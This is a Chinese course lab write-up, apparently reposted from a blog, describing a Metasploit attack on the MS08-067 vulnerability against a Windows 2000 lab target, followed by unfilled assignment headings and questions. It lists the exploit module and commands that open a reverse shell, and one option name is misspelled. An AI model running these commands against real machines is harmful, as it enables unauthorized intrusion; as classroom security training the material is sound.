1.实践内容

1.1 一个主动攻击实践，尽量使用最新的类似漏洞

ms08_067攻击　　靶机windows 2000　　攻击机kali

• 查看windows2000的IP

• 用KALI ping 靶机

可以ping通

• msfconsole打开msf控制台

search ms08-067　　//查看ms08-067具体信息

use exploit/windows/smb/ms08_067_netapi    //选择该漏洞
set payload generic/shell_reverse_tcp    //设置攻击的载荷
set RHOSTS 靶机IP    //设置靶机IP
set LHOSTS kali的IP    //设置攻击机IP
exploit    //进行攻击

1.2 一个针对浏览器的攻击，尽量使用最新的类似漏洞；（1分）

  1.3 一个针对客户端的攻击，如Adobe或office，尽量使用最新的类似漏洞；（1分）

  1.4 成功应用任何一个辅助模块。（1分）

  以上四个小实践可不限于以上示例，并要求至少有一个是和其他所有同学不一样的，否则扣除1分。 

2 问题回答：1分

  2.1.基础问题回答 

   （1）用自己的话解释什么是exploit,payload,encode.

  2.2.实践总结与体会

  2.3.离实战还缺些什么技术或步骤？

  2.4.实践过程记录

原文：https://www.cnblogs.com/zyj2000/p/14730591.html